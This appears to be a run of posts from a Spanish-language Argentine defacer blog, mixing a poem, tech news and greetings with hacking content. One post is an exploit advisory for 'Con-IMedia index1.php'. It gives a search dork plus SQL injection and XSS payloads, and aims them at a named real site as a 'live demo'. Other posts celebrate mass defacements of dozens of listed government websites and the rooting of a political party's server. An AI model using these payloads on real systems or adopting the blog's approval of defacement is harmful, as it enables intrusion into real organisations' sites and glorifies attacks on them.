linux b0x

Hace un tiempo atras navegando en la inet como de costumbre me tope, con una pagina xhtml, que daba amplios conocimientos, referidos a Unix/Linux/BSD.

esta tool, vendria a ser como una caja de herramientas, que verdaremente esta muy completa y copada para darle unas leidas :).

Por otra parte esta todo muy bien organizado para leer, las partes que creas necesarias, y divididas para poder manejar mejor la información.

Aca dejo el link:

http://cb.vu/unixtoolbox_es.xhtml

Con-IMedia (Index1.Php) Multiple Vulnerabilities

# Con-IMedia (index1.php) Multiple Vulnerabilities #

############################################
[~] Name : Con-IMedia (index1.php) Multiple Vulnerabilities
[~] Page : http://www.con-imedia.com/
[~] Home : https://backd0or.wordpress.com/
[~] Author : camil0
[~] Contact : Unavailable
[~] Dork : “inurl:index1.php?linkid=”
############################################
[~] PoC :
http://www.[target].com/patch/index1.php?linkid=-1+UNION+SELECT+concat(version(),0×3a,user())–
http://www.[target].com/patch/index1.php?linkid=%5BXSS%5D
[~] L!ve dem0:
http://www.icsecurities.com/index1.php?linkid=-1+UNION+SELECT+concat(version(),0×3a,user())–
http://www.icsecurities.com/index1.php?linkid=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
############################################

La mirada del defacing argentino en tiempos actuales

Jun, 2013 @ Backd0or Blog

Me he decidido a escribir este articulo en parte por curiosidad y por otra parte porque interpreto que realmente la movida esta estancada en este pais

En estas epocas en donde la iNet ya parece ser un habito mas en la vida cotidiana de la gente, y las redes sociales están tan globalmente adaptadas a cada persona, muchas otras ramificaciones de internet han ido perdiendo bastante prestigio.
Nos referiremos especificamente a la rama del Defacing, que hoy en dia parece ser una practica extinta, considerando la cantidad de defacements que solía haber antes.
Uno dirá, esta practica no se extingue realmente siempre hay algun piyuelo, entrometiendose donde no debe :p, pero realmente asombra la falta de herramientas, y de foros referidos al tema hoy en dia, Siempre refiriendome a la argentina, hace solo unos pocos años atras la cosa era realmente distinta, no solo habia defacers de jerarquia en el pais, sino que tambien, habia muchos que se interesaban en el tema, y realmente se podian comprometer con la cantidad de tools, y tutoriales que habian.
La realidad de hoy en dia es que es raro ver un index cambiado en alguna web argentina o de cualquier tipo, owneada por un argento.

[backd0or Returns] Rooteando el servidor de la Unión Cívica Radical (UCR)

Así como dice el titulo Backd0or esta de vuelta, y bueno para volver a estar en linea, aca dejo un mini video ( que ya tiene su tiempo por cierto), de mi amiwo cereaL ^_^,

original post:  http://cereal.diosdelared.com/

enjoy……

[c0derz cr3w]

Feliz día a todas las madres.

Mi madre cabeza en alto, pelo ondulado al aire
mi madre sonrisa hermosa y un corazon que ante mi se abre
MADRE hoy te dedico estas lineas marcadas con mi sangre
yo estare con tigo en lo que sea
con frio o con hambre te has dedicado a amarme
te has dedicado a darme tanto amor que me has
convertido en un muchacho amable y confiable

MADRE amemonos y dejemos que la gente hable
seras el panal el cual defendere siendo un enjambre
seras el lado bueno de una historia lamentable
seras la unica oreja pa contarle mi secreto inconfesable
sera tu amor la unica droga saludable

Por ti desembaino mi sable contra el culpable
para ti soy capas de alcanzar lo inalcanzable
y asi sigue creciendo este amor inexplicable
amor insaciable amor hacia ti MADRE

Odiame y me sentire el hombre mas odiado
quiereme y me sentire el hombre mas amado
me siento afortunado, no por estar vivo sino que es por vivir
con tigo a mi lado, tu seras la unica persona capaz
vas guiando mis pasos y no das un paso atras
para ser feliz no necesito a nadie mas
tambien amo a otras personas pero con tigo vivo y
muero en paz, eres tu la razon por la que creo en el amor
y al señor le ruego nunca nos separe por favor
que si tu te mueres yo me muero del dolor
y por quitarte de mi lado a DIOS me tomaria rencor

Por ti desembaino mi sable contra el culpable
para ti soy capas de alcanzar lo inalcanzable y asi
sigue creciendo este amor inexplicable
amor insaciable amor hacia ti MADRE

Unica en este mundo nunca existira mujer tan magica
en otro vientre mi vida hubiese sido tragica si no
te tengo a quien reclamo solo quiero decirte
MADRE TE AMO..

Feliz dia a todas las madres :)

Owneds masivos de KKR && [M]entes[C]riminales.

Buenas a todos gente llevaba largo tiempo sin postear, ando en otros temas y he dejado el blog medio abandonado, pero bueno ya era hora de mandarse un post mensual al menos xD, en este caso del mes de agosto hahah.

Durante este tiempito off del blog han pasado varias cosas, con respecto al underground argentino, unas de las noticias más relevantes fueron los Owned masivos de KKR && [M]entes[C]riminales.

Referidos al Impuestazo tecnologico que tuvo gran repercucion en los medios y en la red.

para el que no este muy enterado de la actualidad aca esta el centro del problema:

http://www.minutouno.com/1/hoy/article/113968-Impuesto-tecnol%C3%B3gico,-con-media-sanci%C3%B3n,-deja-afuera-PC-y-laptops/

y en el siguente articulo publicado en Clarín podemos ver la repercución que tubo esto en la red.

Todo esto llevo a que estos 2 grupos convocaran a todos los defacers argentinos a sumarse a ownear la mayoría de las webs del gobierno argentino, hasta tal punto que no quede una sola gov.ar en pie.

http://www.agro.misiones.gov.ar/
http://www.sanjavier.misiones.gov.ar/
http://www.www.ccpm.misiones.gov.ar
http://www.www.ips.misiones.gov.ar
http://www.www.softwarelibre.misiones.gov.ar
http://www.gobierno.misiones.gov.ar/
http://www.www.turismo.misiones.gov.ar
http://www.mbsmyj.misiones.gov.ar
http://www.cinntec.misiones.gov.ar
http://www.multilateral.misiones.gov.ar/
http://www.ifai.misiones.gov.ar/
http://www.ips.misiones.gov.ar
http://www.misiones.gov.ar
http://www.derechoshumanos.misiones.gov.ar
http://www.salud.misiones.gov.ar
http://www.misiones.gov.ar/
http://www.trabajo.misiones.gov.ar
http://www.adelvalleonline.misiones.gov.ar
http://www.cerroazul.misiones.gov.ar
http://www.ot.misiones.gov.ar
http://www.segcg.misiones.gov.ar
http://www.sipted.misiones.gov.ar/
http://www.wap.misiones.gov.ar/
http://www.municipios.misiones.gov.ar
http://www.turismo.misiones.gov.ar
http://www.sps.misiones.gov.ar/
http://www.patagonia.gov.ar/
www.salud.catamarca.gov.ar
www.registroinmobiliario.catamarca.gov.ar
www.trabajo.jujuy.gov.ar
www.proteccioncivil.jujuy.gov.ar
www.hacienda.jujuy.gov.ar
www.propap.jujuy.gov.ar
www.turismo.jujuy.gov.ar
www.mdsjujuy.gov.ar
www.issp.gov.ar
www.proveedores.jujuy.gov.ar
www.pet.jujuy.gov.ar
www.municipios.jujuy.gov.ar
www.policiadejujuy.gov.ar
www.vialidad.jujuy.gov.ar
www.buenosaires.gov.ar
www.buenosaires.gob.ar
www.usigobierno.catamarca.gov.ar
www.autoridades.catamarca.gov.ar
www.hacienda.catamarca.gov.ar

este fue el listado de las webs del gobierno owneadas,

aqui vemos la respuesta de varios diarios de noticias virtuales y demás.

http://www.elonce.com/secciones/politicas/145948-hackearon-la-pagina-web-del-gobierno-de-entre-rios.htm
http://www.taringa.net/posts/noticias/3174731/Hackearon-la-p%C3%A1gina-web-del-gobierno-de-Entre-R%C3%ADos.html
http://www.analisisdigital.com.ar/noticias.php?ed=1&di=0&no=107844
http://www.infobae.com/contenidos/466324-100918-0-Hackearon-la-web-del-gobierno-porte%C3%B1o
http://www.diarioshow.com/notas/2009/08/13/16276-hackearon-la-pagina-de-la-ciudad.html
http://www.aimdigital.com.ar/ver_noticias.php?id_nota=93085
http://infoalternativa.com.ar/main/index.php/entre-rios/633-hackearon-la-pagina-web-del-gobierno-de-entre-rios
http://www.atp.com.ar/post/Info/121490/Hackean_masivamente_sitios_del_Gobierno.html
http://www.unoentrerios.com.ar/noticias/nota.php?id=5854
http://www.radiolt14.com.ar/noticia.php?st=nt&bd=n&id=39099
http://www.diariodelsurdigital.com.ar/Hackearon-la-pagina-web-del-Gobierno-de-Entre-Rios
http://www.clubpremiere.com.ar/foro/viewtopic.php?t=7332328
http://www.tnylagente.com.ar/videolog=DrHouse?57853
http://juninblog.com.ar/tag/hackean-wwwjuningovar
http://lacalle-online.com/interior.php?ID=168792
http://www.litoralfm.com.ar/despachos.asp?cod_des=41855&ID_Seccion=107
http://www.inventario22.com.ar/textocomp.asp?id=37726
http://www.lanacion.com.ar/nota.asp?nota_id=1162203
http://www.cndigital.com.ar/ver_noticias.php?id_nota=10876
http://www.derf.com.ar/despachos.asp?cod_des=282946&ID_Seccion=21
http://ambito.com/noticia.asp?id=476586
http://www.mediterraneaweb.com.ar/?p=8105
http://www.paginapolitica.com/provinciales/nota.php?id=9358
http://www.diarioelargentino.com.ar/notas.php?id=64482&PHPSESSID=f8048caae1eed8afca88e6e8fbd1a01a

Bytez.

Chrome OS libre de virus?

El proximo sistema operativo de Google eliminara
definitivamente el problema de los virus informaticos, asegura el director de ingenieria de la companiia.

Diario Ti: El director de ingenieria de Google, Linus Upson, declaro en una entrevista con la publicacion New Scientist, que el anunciado sistema operativo Chrome OS dejara en la obsolescencia a los codigos malignos actuales.

«Hemos rediseniado la arquitectura subyacente de seguridad de una manera tan radical, que los usuarios ya no tendran que preocuparse por los virus, el malware ni las actualizaciones de seguridad. El sistema sencillamente funcionara», declaro Upson.

El sistema operativo Chrome OS estara basado en un kernel Liux, pero al contrario que los sistemas operativos tradicionales, la mayor parte de los procesos seran ejecutados en la nube. De esa forma, un numero considerablemente inferior de elementos deberan ser descargados a la computadora personal del usuario. Segun Linus Upson, esta caracteristica beneficiara, sin duda alguna, la seguridad informatica.

En la entrevista, Upson indica que las descargas siempre iran uno o dos pasos detras del acceso basado en la nube, debido a que toma tiempo descargar las actualizaciones de
instalarlas en el PC.

Paul Jackson, analista de Forrester Research, coincidio con lo anterior senialando que «la nube siempre parcheara con mayor rapidez». Con todo, Jackson no coincide del todo con la categorica afirmacion de Upson, en el sentido que los usuarios de Chrome OS de grandes preocuparse totalmente de los virus. Al respecto, Jackson senialo que el sistema operativo de Google sera inevitablemente vulnerable a los ataques realizados contra el navegador, o contra el kernel de Linux.

Fuente: ArgentinaSecurity

Feliz dia del amigo!

Feliz dia del amigo para todos los que sientan dentro suyo que son mis amigos!

Un fuerte abrazo y un gran afecto a todos ellos.

Camilo.M

IMAGESHACK OWNED

They decided to hack imageshack to bring attention to some security flaw which they allege was allowed to exist by security software providers fully disclosing the weakness. I do know the word “Script Kiddies” means inexperienced punks who often literally copy/paste code–IE the opposite of a true hacker who knows how a system works to find a weakness. I guess these guys are saying even some amateurs could do serious damage.

“In the end, more than freedom, they wanted security. They wanted a comfortable life, and they lost it all – security, comfort, and freedom. When the Athenians finally wanted not to give to society but for society to give to them, when the freedom they wished for most was freedom from responsibility, then Athens ceased to be free and was never free again.” –Edward Gibbon

http://antisec.wordpress.com/

Hackean la página oficial del padrón electoral nacional

En el día en que comenzo la veda electoral la pagina oficial del padron electoral nacional (www.padrones.gov.ar) fue modificada en algunos de sus contenidos (ver en la foto) Con ofensas para la Capital y Buenos Aires.

El bug del sitio perteneciente al poder judicial de la nación fue rapidamente fixeado por sus administradores. Pero aun asi no han podido evitar que durante algunos minutos apareciera la palabra «chorros» pegada a Capital y «ladrones» a la de Buenos Aires.